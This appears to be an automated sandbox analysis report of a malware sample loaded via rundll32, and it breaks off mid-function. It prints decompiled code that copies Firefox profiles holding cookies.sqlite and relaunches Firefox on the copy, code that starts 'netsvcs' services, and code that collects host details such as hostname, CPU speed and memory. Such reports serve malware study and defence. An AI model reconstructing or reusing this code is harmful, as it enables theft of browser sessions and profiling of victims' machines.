                                                                                              			E04256A40(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v12;
                                                                                              				short _v536;
                                                                                              				short _v1056;
                                                                                              				short _v1576;
                                                                                              				short _v2096;
                                                                                              				struct _WIN32_FIND_DATAW _v2688;
                                                                                              				char _v2692;
                                                                                              				intOrPtr _v2696;
                                                                                              				char _v2712;
                                                                                              				signed int _t34;
                                                                                              				int _t60;
                                                                                              				intOrPtr _t76;
                                                                                              				void* _t77;
                                                                                              				void* _t89;
                                                                                              				void* _t91;
                                                                                              				signed int _t92;
                                                                                              				void* _t93;
                                                                                              				void* _t94;
                                                                                              
                                                                                              				_t34 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v12 = _t34 ^ _t92;
                                                                                              				_t76 = __ecx;
                                                                                              				_v2692 = 0x104;
                                                                                              				_v2696 = __ecx;
                                                                                              				_t79 =  &_v536;
                                                                                              				if(E04267240( &_v536,  &_v2692, __eflags) == 0) {
                                                                                              					__eflags = _v12 ^ _t92;
                                                                                              					return E04275AFE(_v12 ^ _t92);
                                                                                              				} else {
                                                                                              					lstrcatW( &_v536, L"\\AppData\\Roaming\\Mozilla\\Firefox");
                                                                                              					_t77 = wsprintfW;
                                                                                              					wsprintfW( &_v1576, L"%s\\%s",  &_v536,  *((intOrPtr*)(_t76 + 0x70)));
                                                                                              					wsprintfW( &_v2096, L"%s%s",  &_v536, L"\\Profiles\\*.*");
                                                                                              					_t94 = _t93 + 0x20;
                                                                                              					_t89 = FindFirstFileW( &_v2096,  &_v2688);
                                                                                              					if(_t89 != 0xffffffff) {
                                                                                              						_t91 = lstrcmpW;
                                                                                              						do {
                                                                                              							if(lstrcmpW( &(_v2688.cFileName), ".") == 0 || lstrcmpW( &(_v2688.cFileName), L"..") == 0) {
                                                                                              								goto L6;
                                                                                              							} else {
                                                                                              								wsprintfW( &_v1056, L"%s\\Profiles\\%s\\cookies.sqlite",  &_v536,  &(_v2688.cFileName));
                                                                                              								_t94 = _t94 + 0x10;
                                                                                              								if(PathFileExistsW( &_v1056) != 0) {
                                                                                              									wsprintfW( &_v1056, L"%s\\Profiles\\%s",  &_v536,  &(_v2688.cFileName));
                                                                                              									_t94 = _t94 + 0x10;
                                                                                              									_t79 =  &_v1056;
                                                                                              									E042673D0(_t77,  &_v1056,  &_v1576, _t89, _t91);
                                                                                              								} else {
                                                                                              									goto L6;
                                                                                              								}
                                                                                              							}
                                                                                              							L9:
                                                                                              							FindClose(_t89);
                                                                                              							goto L10;
                                                                                              							L6:
                                                                                              							_t60 = FindNextFileW(_t89,  &_v2688);
                                                                                              							_t104 = _t60;
                                                                                              						} while (_t60 != 0);
                                                                                              						goto L9;
                                                                                              					}
                                                                                              					L10:
                                                                                              					wsprintfW( &_v536, L"cmd.exe /c start firefox.exe -no-remote -profile \"%s\"",  &_v1576);
                                                                                              					asm("xorps xmm0, xmm0");
                                                                                              					asm("movups [ebp-0xa94], xmm0");
                                                                                              					_push( &_v2712);
                                                                                              					_push( &_v536);
                                                                                              					E042672E0(_t77,  *((intOrPtr*)(_v2696 + 0x70)), _t104);
                                                                                              					return E04275AFE(_v12 ^ _t92, _t79);
                                                                                              				}
                                                                                              			}





















                                                                                              0x04256a49
                                                                                              0x04256a50
                                                                                              0x04256a54
                                                                                              0x04256a56
                                                                                              0x04256a68
                                                                                              0x04256a6e
                                                                                              0x04256a7b
                                                                                              0x04256bf1
                                                                                              0x04256bfc
                                                                                              0x04256a81
                                                                                              0x04256a8d
                                                                                              0x04256a96
                                                                                              0x04256aaf
                                                                                              0x04256ac9
                                                                                              0x04256acb
                                                                                              0x04256ae2
                                                                                              0x04256ae7
                                                                                              0x04256aed
                                                                                              0x04256af3
                                                                                              0x04256b03
                                                                                              0x00000000
                                                                                              0x04256b17
                                                                                              0x04256b31
                                                                                              0x04256b33
                                                                                              0x04256b45
                                                                                              0x04256b75
                                                                                              0x04256b77
                                                                                              0x04256b80
                                                                                              0x04256b86
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04256b45
                                                                                              0x04256b8b
                                                                                              0x04256b8c
                                                                                              0x00000000
                                                                                              0x04256b47
                                                                                              0x04256b4f
                                                                                              0x04256b55
                                                                                              0x04256b55
                                                                                              0x00000000
                                                                                              0x04256b59
                                                                                              0x04256b92
                                                                                              0x04256ba5
                                                                                              0x04256bb6
                                                                                              0x04256bb9
                                                                                              0x04256bc3
                                                                                              0x04256bcd
                                                                                              0x04256bcf
                                                                                              0x04256be7
                                                                                              0x04256be7

                                                                                              APIs
                                                                                                • Part of subcall function 04267240: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,042568B1), ref: 04267269
                                                                                                • Part of subcall function 04267240: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04267279
                                                                                                • Part of subcall function 04267240: CloseHandle.KERNEL32(?,?,?,?,042568B1), ref: 042672A0
                                                                                              • lstrcatW.KERNEL32(?,\AppData\Roaming\Mozilla\Firefox), ref: 04256A8D
                                                                                              • wsprintfW.USER32 ref: 04256AAF
                                                                                              • wsprintfW.USER32 ref: 04256AC9
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 04256ADC
                                                                                              • lstrcmpW.KERNEL32(?,0429D940), ref: 04256AFF
                                                                                              • lstrcmpW.KERNEL32(?,0429D944), ref: 04256B11
                                                                                              • wsprintfW.USER32 ref: 04256B31
                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 04256B3D
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 04256B4F
                                                                                              • wsprintfW.USER32 ref: 04256B75
                                                                                              • FindClose.KERNEL32(00000000), ref: 04256B8C
                                                                                              • wsprintfW.USER32 ref: 04256BA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: wsprintf$FileFind$Closelstrcmp$AddressExistsFirstHandleLibraryLoadNextPathProclstrcat
                                                                                              • String ID: %s%s$%s\%s$%s\Profiles\%s$%s\Profiles\%s\cookies.sqlite$\AppData\Roaming\Mozilla\Firefox$\Profiles\*.*$cmd.exe /c start firefox.exe -no-remote -profile "%s"
                                                                                              • API String ID: 2816992129-409733341
                                                                                              • Opcode ID: 75ea6797cc06f113198ee707f33962f70803c82faf53c3c144e0a025cd0888eb
                                                                                              • Instruction ID: 7e7ac1fe098ddc447527b3d4988daeea22780603a022a9379e10e318e2d29216
                                                                                              • Opcode Fuzzy Hash: 75ea6797cc06f113198ee707f33962f70803c82faf53c3c144e0a025cd0888eb
                                                                                              • Instruction Fuzzy Hash: 9C414572B5021D57DB20EA64DD84EEAB3BCEB59314F4041E5A90DE3040EA34BE958F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 63%
                                                                                              			E0426BBC0() {
                                                                                              				int _v8;
                                                                                              				int _v12;
                                                                                              				int _v16;
                                                                                              				void* _v20;
                                                                                              				int _v24;
                                                                                              				int _v28;
                                                                                              				short** _v32;
                                                                                              				int _v36;
                                                                                              				void* _t34;
                                                                                              				int _t39;
                                                                                              				long _t40;
                                                                                              				void* _t41;
                                                                                              				int _t50;
                                                                                              				WCHAR* _t54;
                                                                                              				void* _t66;
                                                                                              				short** _t73;
                                                                                              				void* _t75;
                                                                                              				void* _t76;
                                                                                              				intOrPtr* _t77;
                                                                                              				void* _t80;
                                                                                              
                                                                                              				_v24 = 0;
                                                                                              				_v16 = 0;
                                                                                              				_v8 = 0;
                                                                                              				_v12 = 0;
                                                                                              				_t34 = OpenSCManagerW(0, 0, 0xf003f);
                                                                                              				_t75 = _t34;
                                                                                              				if(_t75 != 0) {
                                                                                              					_t77 = __imp__EnumServicesStatusExW;
                                                                                              					 *_t77(_t75, 0, 0x30, 2, 0, 0,  &_v16,  &_v8,  &_v12, 0, _t76);
                                                                                              					_t39 = _v16;
                                                                                              					if(_t39 != 0) {
                                                                                              						_t40 = _t39 + 0x2c;
                                                                                              						_v32 = _t40;
                                                                                              						_t41 = LocalAlloc(0x40, _t40);
                                                                                              						_v20 = _t41;
                                                                                              						if(_t41 != 0) {
                                                                                              							_push(0);
                                                                                              							_v12 = 0;
                                                                                              							_push( &_v12);
                                                                                              							_push( &_v8);
                                                                                              							_push( &_v16);
                                                                                              							_push(_v32);
                                                                                              							_push(_t41);
                                                                                              							_push(2);
                                                                                              							_push(0x30);
                                                                                              							_push(0);
                                                                                              							_push(_t75);
                                                                                              							if( *_t77() != 0) {
                                                                                              								_t66 = LocalAlloc(0x40, 0x2000);
                                                                                              								_v36 = 0;
                                                                                              								_v28 = 0;
                                                                                              								if(_v8 > 0) {
                                                                                              									_t73 = _v20;
                                                                                              									_v32 = _t73;
                                                                                              									do {
                                                                                              										_t80 = OpenServiceW(_t75,  *_t73, 0x15);
                                                                                              										if(_t80 != 0) {
                                                                                              											if(QueryServiceConfigW(_t80, _t66, 0x2000,  &_v36) != 0 &&  *((intOrPtr*)(_t66 + 4)) == 2) {
                                                                                              												_t54 =  *(_t66 + 0xc);
                                                                                              												if(_t54 != 0 && StrStrIW(_t54, L"-k netsvcs") != 0 && StartServiceW(_t80, 0, 0) != 0) {
                                                                                              													_v24 = _v24 + 1;
                                                                                              												}
                                                                                              											}
                                                                                              											CloseServiceHandle(_t80);
                                                                                              										}
                                                                                              										_t50 = _v28 + 1;
                                                                                              										_t73 =  &(_v32[0xb]);
                                                                                              										_v28 = _t50;
                                                                                              										_v32 = _t73;
                                                                                              									} while (_t50 < _v8);
                                                                                              								}
                                                                                              								LocalFree(_t66);
                                                                                              								LocalFree(_v20);
                                                                                              								CloseServiceHandle(_t75);
                                                                                              								return _v24;
                                                                                              							} else {
                                                                                              								CloseServiceHandle(_t75);
                                                                                              								LocalFree(_v20);
                                                                                              								return 0;
                                                                                              							}
                                                                                              						} else {
                                                                                              							CloseServiceHandle(_t75);
                                                                                              							return 0;
                                                                                              						}
                                                                                              					} else {
                                                                                              						CloseServiceHandle(_t75);
                                                                                              						return 0;
                                                                                              					}
                                                                                              				} else {
                                                                                              					return _t34;
                                                                                              				}
                                                                                              			}























                                                                                              0x0426bbd0
                                                                                              0x0426bbd7
                                                                                              0x0426bbde
                                                                                              0x0426bbe5
                                                                                              0x0426bbec
                                                                                              0x0426bbf2
                                                                                              0x0426bbf6
                                                                                              0x0426bbfe
                                                                                              0x0426bc1d
                                                                                              0x0426bc1f
                                                                                              0x0426bc24
                                                                                              0x0426bc3c
                                                                                              0x0426bc42
                                                                                              0x0426bc45
                                                                                              0x0426bc47
                                                                                              0x0426bc4c
                                                                                              0x0426bc5e
                                                                                              0x0426bc63
                                                                                              0x0426bc6a
                                                                                              0x0426bc6e
                                                                                              0x0426bc72
                                                                                              0x0426bc73
                                                                                              0x0426bc76
                                                                                              0x0426bc77
                                                                                              0x0426bc79
                                                                                              0x0426bc7b
                                                                                              0x0426bc7d
                                                                                              0x0426bc82
                                                                                              0x0426bcaa
                                                                                              0x0426bcac
                                                                                              0x0426bcb3
                                                                                              0x0426bcba
                                                                                              0x0426bcbc
                                                                                              0x0426bcbf
                                                                                              0x0426bcc2
                                                                                              0x0426bccd
                                                                                              0x0426bcd1
                                                                                              0x0426bce6
                                                                                              0x0426bcee
                                                                                              0x0426bcf3
                                                                                              0x0426bd14
                                                                                              0x0426bd14
                                                                                              0x0426bcf3
                                                                                              0x0426bd18
                                                                                              0x0426bd18
                                                                                              0x0426bd24
                                                                                              0x0426bd25
                                                                                              0x0426bd28
                                                                                              0x0426bd2b
                                                                                              0x0426bd2e
                                                                                              0x0426bcc2
                                                                                              0x0426bd3a
                                                                                              0x0426bd3f
                                                                                              0x0426bd42
                                                                                              0x0426bd51
                                                                                              0x0426bc84
                                                                                              0x0426bc85
                                                                                              0x0426bc8e
                                                                                              0x0426bc9c
                                                                                              0x0426bc9c
                                                                                              0x0426bc4e
                                                                                              0x0426bc4f
                                                                                              0x0426bc5d
                                                                                              0x0426bc5d
                                                                                              0x0426bc26
                                                                                              0x0426bc27
                                                                                              0x0426bc34
                                                                                              0x0426bc34
                                                                                              0x0426bbfc
                                                                                              0x0426bbfc
                                                                                              0x0426bbfc

                                                                                              APIs
                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000), ref: 0426BBEC
                                                                                              • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0426BC1D
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 0426BC27
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEnumHandleManagerOpenServiceServicesStatus
                                                                                              • String ID: -k netsvcs
                                                                                              • API String ID: 236840872-1604415765
                                                                                              • Opcode ID: c3928dc0c1a1483eed84650fe276be0f989e7c408f1e6bfb859504b87da236af
                                                                                              • Instruction ID: f24b40392aaf33276703a296149150a5545ecedf54a68080a3572820fbc3277b
                                                                                              • Opcode Fuzzy Hash: c3928dc0c1a1483eed84650fe276be0f989e7c408f1e6bfb859504b87da236af
                                                                                              • Instruction Fuzzy Hash: 5751A671B44219BBEB109FA4EC49FFEBBB8EF04714F104055E505E6181DB78AD41CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 94%
                                                                                              			E042673D0(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				short _v532;
                                                                                              				short _v1052;
                                                                                              				short _v1572;
                                                                                              				struct _WIN32_FIND_DATAW _v2164;
                                                                                              				WCHAR* _v2168;
                                                                                              				WCHAR* _v2172;
                                                                                              				void* _v2176;
                                                                                              				signed int _t35;
                                                                                              				int _t43;
                                                                                              				void* _t46;
                                                                                              				WCHAR* _t81;
                                                                                              				void* _t82;
                                                                                              				void* _t90;
                                                                                              				WCHAR* _t92;
                                                                                              				void* _t93;
                                                                                              				signed int _t94;
                                                                                              				void* _t95;
                                                                                              				void* _t96;
                                                                                              
                                                                                              				_t35 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t35 ^ _t94;
                                                                                              				_t92 = __edx;
                                                                                              				_t81 = __ecx;
                                                                                              				_v2172 = __edx;
                                                                                              				_v2168 = __ecx;
                                                                                              				E0427DEA0(__edi,  &_v1572, 0, 0x208);
                                                                                              				_t96 = _t95 + 0xc;
                                                                                              				lstrcpyW( &_v1572, _t81);
                                                                                              				_t90 = lstrcatW;
                                                                                              				lstrcatW( &_v1572, L"\\*");
                                                                                              				_t43 = CreateDirectoryW(_t92, 0);
                                                                                              				_t82 = GetLastError;
                                                                                              				if(_t43 != 0 || GetLastError() == 0xb7) {
                                                                                              					_t46 = FindFirstFileW( &_v1572,  &_v2164);
                                                                                              					_v2176 = _t46;
                                                                                              					if(_t46 == 0xffffffff) {
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					_t93 = lstrcmpW;
                                                                                              					asm("o16 nop [eax+eax]");
                                                                                              					do {
                                                                                              						E0427DEA0(_t90,  &_v1052, 0, 0x208);
                                                                                              						lstrcpyW( &_v1052, _v2168);
                                                                                              						lstrcatW( &_v1052, 0x429d92c);
                                                                                              						lstrcatW( &_v1052,  &(_v2164.cFileName));
                                                                                              						E0427DEA0(_t90,  &_v532, 0, 0x208);
                                                                                              						_t96 = _t96 + 0x18;
                                                                                              						lstrcpyW( &_v532, _v2172);
                                                                                              						lstrcatW( &_v532, 0x429d92c);
                                                                                              						lstrcatW( &_v532,  &(_v2164.cFileName));
                                                                                              						if((_v2164.dwFileAttributes & 0x00000010) == 0 || lstrcmpW( &(_v2164.cFileName), ".") == 0 || lstrcmpW( &(_v2164.cFileName), L"..") == 0) {
                                                                                              							CopyFileW( &_v1052,  &_v532, 0);
                                                                                              						} else {
                                                                                              							if(CreateDirectoryW( &_v532, 0) != 0 || GetLastError() == 0xb7) {
                                                                                              								E042673D0(_t82,  &_v1052,  &_v532, _t90, _t93);
                                                                                              							}
                                                                                              						}
                                                                                              					} while (FindNextFileW(_v2176,  &_v2164) != 0);
                                                                                              					goto L12;
                                                                                              				} else {
                                                                                              					L12:
                                                                                              					return E04275AFE(_v8 ^ _t94);
                                                                                              				}
                                                                                              			}






















                                                                                              0x042673d9
                                                                                              0x042673e0
                                                                                              0x042673f1
                                                                                              0x042673f3
                                                                                              0x042673f5
                                                                                              0x042673fe
                                                                                              0x04267404
                                                                                              0x04267409
                                                                                              0x04267414
                                                                                              0x0426741a
                                                                                              0x0426742c
                                                                                              0x04267431
                                                                                              0x04267437
                                                                                              0x0426743f
                                                                                              0x0426745c
                                                                                              0x04267462
                                                                                              0x0426746b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04267471
                                                                                              0x04267477
                                                                                              0x04267480
                                                                                              0x0426748e
                                                                                              0x042674a3
                                                                                              0x042674b5
                                                                                              0x042674c5
                                                                                              0x042674d5
                                                                                              0x042674da
                                                                                              0x042674ea
                                                                                              0x042674fc
                                                                                              0x0426750c
                                                                                              0x04267515
                                                                                              0x0426757a
                                                                                              0x0426753b
                                                                                              0x0426754c
                                                                                              0x04267563
                                                                                              0x04267563
                                                                                              0x0426754c
                                                                                              0x04267593
                                                                                              0x00000000
                                                                                              0x0426759b
                                                                                              0x0426759b
                                                                                              0x042675ab
                                                                                              0x042675ab

                                                                                              APIs
                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 04267414
                                                                                              • lstrcatW.KERNEL32(?,0429F170), ref: 0426742C
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 04267431
                                                                                              • GetLastError.KERNEL32 ref: 04267441
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0426745C
                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 042674A3
                                                                                              • lstrcatW.KERNEL32(?,0429D92C), ref: 042674B5
                                                                                              • lstrcatW.KERNEL32(?,?), ref: 042674C5
                                                                                              • lstrcpyW.KERNEL32(?,?), ref: 042674EA
                                                                                              • lstrcatW.KERNEL32(?,0429D92C), ref: 042674FC
                                                                                              • lstrcatW.KERNEL32(?,?), ref: 0426750C
                                                                                              • lstrcmpW.KERNEL32(?,0429D940), ref: 04267523
                                                                                              • lstrcmpW.KERNEL32(?,0429D944), ref: 04267535
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 04267544
                                                                                              • GetLastError.KERNEL32 ref: 0426754E
                                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 0426757A
                                                                                              • FindNextFileW.KERNEL32(?,00000010), ref: 0426758D
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrcat$Filelstrcpy$CreateDirectoryErrorFindLastlstrcmp$CopyFirstNext
                                                                                              • String ID:
                                                                                              • API String ID: 2173410017-0
                                                                                              • Opcode ID: af4eb4bef11fe4e5ee91ce153329ea4c1db8992c1db437be32b58447fb1b4d2a
                                                                                              • Instruction ID: 15308a459a93a4e883ce4e72c62f30f2898c5970da9c927b5e3136536196dfd3
                                                                                              • Opcode Fuzzy Hash: af4eb4bef11fe4e5ee91ce153329ea4c1db8992c1db437be32b58447fb1b4d2a
                                                                                              • Instruction Fuzzy Hash: 63413071A1422DAADB20EA74EC48FDA77BCFB48304F1445E9A50DE3041EB74EE858F94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 69%
                                                                                              			E0426B0C0(void* __ebx, int __ecx, union %anon243 __edx, void* __edi, void* __esi, signed short* _a4, signed short* _a8, signed short* _a12, intOrPtr _a16) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v40;
                                                                                              				void _v428;
                                                                                              				short _v628;
                                                                                              				void* _v668;
                                                                                              				struct _MEMORYSTATUSEX _v740;
                                                                                              				struct _SYSTEM_INFO _v776;
                                                                                              				char _v788;
                                                                                              				int _v792;
                                                                                              				int _v796;
                                                                                              				intOrPtr _v800;
                                                                                              				void* _v804;
                                                                                              				char _v808;
                                                                                              				signed int _t77;
                                                                                              				signed int _t79;
                                                                                              				intOrPtr _t81;
                                                                                              				signed int _t89;
                                                                                              				signed int _t93;
                                                                                              				char* _t95;
                                                                                              				intOrPtr _t99;
                                                                                              				signed int _t116;
                                                                                              				signed int _t117;
                                                                                              				signed int _t118;
                                                                                              				signed int _t119;
                                                                                              				void* _t129;
                                                                                              				void* _t130;
                                                                                              				int _t131;
                                                                                              				signed int _t133;
                                                                                              				signed int _t141;
                                                                                              				signed short* _t146;
                                                                                              				signed short* _t148;
                                                                                              				signed int _t156;
                                                                                              				void* _t160;
                                                                                              				signed int _t162;
                                                                                              				signed int _t164;
                                                                                              				signed short* _t165;
                                                                                              				intOrPtr* _t179;
                                                                                              				void* _t181;
                                                                                              				void* _t182;
                                                                                              				signed int _t184;
                                                                                              				signed int _t188;
                                                                                              				signed int _t190;
                                                                                              				void* _t191;
                                                                                              				void* _t193;
                                                                                              
                                                                                              				_t167 = __edi;
                                                                                              				_t136 = __ecx;
                                                                                              				_t190 = (_t188 & 0xfffffff8) - 0x31c;
                                                                                              				_t77 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t77 ^ _t190;
                                                                                              				_t79 =  *0x42a78d0; // 0x0
                                                                                              				_v776.dwOemId = __edx;
                                                                                              				_v792 = __ecx;
                                                                                              				_push(__ebx);
                                                                                              				_push(__esi);
                                                                                              				_push(__edi);
                                                                                              				_t195 = _t79;
                                                                                              				if(_t79 == 0) {
                                                                                              					_t131 = E04275B14(__esi, _t195, 0x3c);
                                                                                              					_t190 = _t190 + 4;
                                                                                              					_t136 = _t131;
                                                                                              					_t79 = E042562B0(__ebx, _t131, __edi);
                                                                                              					 *0x42a78d0 = _t79;
                                                                                              				}
                                                                                              				_t179 =  *_t79;
                                                                                              				if(_t179 != 0) {
                                                                                              					_t81 =  *_t179 + 0x378;
                                                                                              					_push(_t81);
                                                                                              					_v776.dwPageSize = _t81;
                                                                                              					_t133 = E04275B55(_t136, _t179, __eflags);
                                                                                              					_t190 = _t190 + 4;
                                                                                              					__eflags = _t133;
                                                                                              					if(_t133 == 0) {
                                                                                              						goto L3;
                                                                                              					} else {
                                                                                              						_t6 = _t133 + 0x350; // 0x350
                                                                                              						E0427E060(_t6, _t179,  *_t179 + 0x28);
                                                                                              						_t89 =  *0x42a78d0; // 0x0
                                                                                              						_t191 = _t190 + 0xc;
                                                                                              						__eflags = _t89;
                                                                                              						if(__eflags == 0) {
                                                                                              							_t130 = E04275B14(_t179, __eflags, 0x3c);
                                                                                              							_t191 = _t191 + 4;
                                                                                              							_t89 = E042562B0(_t133, _t130, _t167);
                                                                                              							 *0x42a78d0 = _t89;
                                                                                              						}
                                                                                              						asm("movups xmm0, [eax+0x4]");
                                                                                              						asm("movups [ebx+0x8], xmm0");
                                                                                              						asm("movups xmm0, [eax+0x14]");
                                                                                              						asm("movups [ebx+0x18], xmm0");
                                                                                              						 *((char*)(_t133 + 0x28)) =  *((intOrPtr*)(_t89 + 0x24));
                                                                                              						 *_t133 = 0x99;
                                                                                              						 *((intOrPtr*)(_t133 + 0x348)) = GetTickCount();
                                                                                              						 *((intOrPtr*)(_t133 + 0x34c)) = GetCurrentProcessId();
                                                                                              						_t93 =  *0x42a78d0; // 0x0
                                                                                              						__eflags = _t93;
                                                                                              						if(__eflags == 0) {
                                                                                              							_t129 = E04275B14(_t179, __eflags, 0x3c);
                                                                                              							_t191 = _t191 + 4;
                                                                                              							_t93 = E042562B0(_t133, _t129, _t167);
                                                                                              							 *0x42a78d0 = _t93;
                                                                                              						}
                                                                                              						_t181 =  *(_t93 + 0x28);
                                                                                              						_t12 = _t133 + 0x2c; // 0x2c
                                                                                              						_t95 = memcpy(_t12, _t181, 0x48 << 2);
                                                                                              						_t171 = _t181 + 0x90;
                                                                                              						gethostname(_t95, 0x100);
                                                                                              						asm("movups xmm0, [esp+0x90]");
                                                                                              						_t15 = _t133 + 0x2e8; // 0x2e8
                                                                                              						_t182 = _t15;
                                                                                              						asm("movups [ebx+0x158], xmm0");
                                                                                              						asm("movups xmm0, [esp+0xa8]");
                                                                                              						asm("movups [ebx+0x168], xmm0");
                                                                                              						asm("movups xmm0, [esp+0xbc]");
                                                                                              						asm("movups [ebx+0x178], xmm0");
                                                                                              						 *((short*)(_t133 + 0x188)) = _v628;
                                                                                              						E0427DEA0(_t181 + 0x90, _t182, 0, 0x5e);
                                                                                              						_t99 = _v800;
                                                                                              						_t19 = _t133 + 0x346; // 0x346
                                                                                              						_t160 = _t19;
                                                                                              						_t193 = _t191 + 0x18;
                                                                                              						_v808 = 0x2f;
                                                                                              						_t141 =  *(_t99 + 0x5c) & 0x0000ffff;
                                                                                              						__eflags = _t141 - 1;
                                                                                              						if(_t141 != 1) {
                                                                                              							__eflags = _t141 - 2;
                                                                                              							if(_t141 == 2) {
                                                                                              								_t156 =  *((intOrPtr*)(_t99 + 0x24)) + 4;
                                                                                              								__eflags = _t156;
                                                                                              								goto L13;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t156 =  *(_t99 + 0x20);
                                                                                              							L13:
                                                                                              							 *((intOrPtr*)( *_t156 + 0x34))(_t182,  &_v808, _t160);
                                                                                              						}
                                                                                              						GetSystemInfo( &_v776);
                                                                                              						 *((short*)(_t133 + 0x14c)) = _v776.dwNumberOfProcessors;
                                                                                              						_v796 = 4;
                                                                                              						_v792 = 4;
                                                                                              						RegOpenKeyW(0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0",  &_v804);
                                                                                              						RegQueryValueExW(_v804, L"~MHz", 0,  &_v792,  &_v788,  &_v796);
                                                                                              						RegCloseKey(_v804);
                                                                                              						 *(_t133 + 0x150) = _v788;
                                                                                              						_v740.dwLength = 0x40;
                                                                                              						GlobalMemoryStatusEx( &_v740);
                                                                                              						 *(_t133 + 0x154) = (_v740.ullTotalPhys << 0x00000020 | _v740.dwMemoryLoad) >> 0x14;
                                                                                              						__imp__CoInitialize(0);
                                                                                              						 *((intOrPtr*)(_t133 + 0x2e4)) = E04252DB0(_t133, 0, _t171, _t182);
                                                                                              						__imp__CoUninitialize();
                                                                                              						 *((intOrPtr*)(_t133 + 0x18c)) = _v792;
                                                                                              						__eflags = E0426AE80(_t133,  &_v428, _t171, _t182, __eflags);
                                                                                              						if(__eflags == 0) {
                                                                                              							_t146 = _a4;
                                                                                              							_t56 = _t133 + 0x190; // 0x190
                                                                                              							_t162 = _t56 - _t146;
                                                                                              							__eflags = _t162;
                                                                                              							do {
                                                                                              								_t116 =  *_t146 & 0x0000ffff;
                                                                                              								_t146 =  &(_t146[1]);
                                                                                              								 *(_t162 + _t146 - 2) = _t116;
                                                                                              								__eflags = _t116;
                                                                                              							} while (__eflags != 0);
                                                                                              						} else {
                                                                                              							_t52 = _t133 + 0x190; // 0x190
                                                                                              							_t182 =  &_v428;
                                                                                              							memcpy(_t52, _t182, 0x19 << 2);
                                                                                              							_t193 = _t193 + 0xc;
                                                                                              							_t171 = _t182 + 0x32;
                                                                                              						}
                                                                                              						_t117 = E0426AFA0(_t133,  &_v428, _t171, _t182, __eflags);
                                                                                              						__eflags = _t117;
                                                                                              						if(_t117 == 0) {
                                                                                              							_t148 = _a8;
                                                                                              							_t65 = _t133 + 0x1f4; // 0x1f4
                                                                                              							_t164 = _t65 - _t148;
                                                                                              							__eflags = _t164;
                                                                                              							do {
                                                                                              								_t118 =  *_t148 & 0x0000ffff;
                                                                                              								 *(_t148 + _t164) = _t118;
                                                                                              								_t148 =  &(_t148[1]);
                                                                                              								__eflags = _t118;
                                                                                              							} while (_t118 != 0);
                                                                                              						} else {
                                                                                              							_t61 = _t133 + 0x1f4; // 0x1f4
                                                                                              							memcpy(_t61,  &_v428, 0x32 << 2);
                                                                                              							_t193 = _t193 + 0xc;
                                                                                              							_t148 = 0;
                                                                                              						}
                                                                                              						_t165 = _a12;
                                                                                              						_t68 = _t133 + 0x2bc; // 0x2bc
                                                                                              						_t184 = _t68 - _t165;
                                                                                              						__eflags = _t184;
                                                                                              						do {
                                                                                              							_t119 =  *_t165 & 0x0000ffff;
                                                                                              							_t69 =  &(_t165[1]); // 0x0
                                                                                              							_t165 = _t69;
                                                                                              							 *(_t184 + _t165 - 2) = _t119;
                                                                                              							__eflags = _t119;
                                                                                              						} while (_t119 != 0);
                                                                                              						_push(_t148);
                                                                                              						_push(0x3f);
                                                                                              						_push(_v788);
                                                                                              						 *((intOrPtr*)(_t133 + 4)) = _a16;
                                                                                              						E04251C60(_v808);
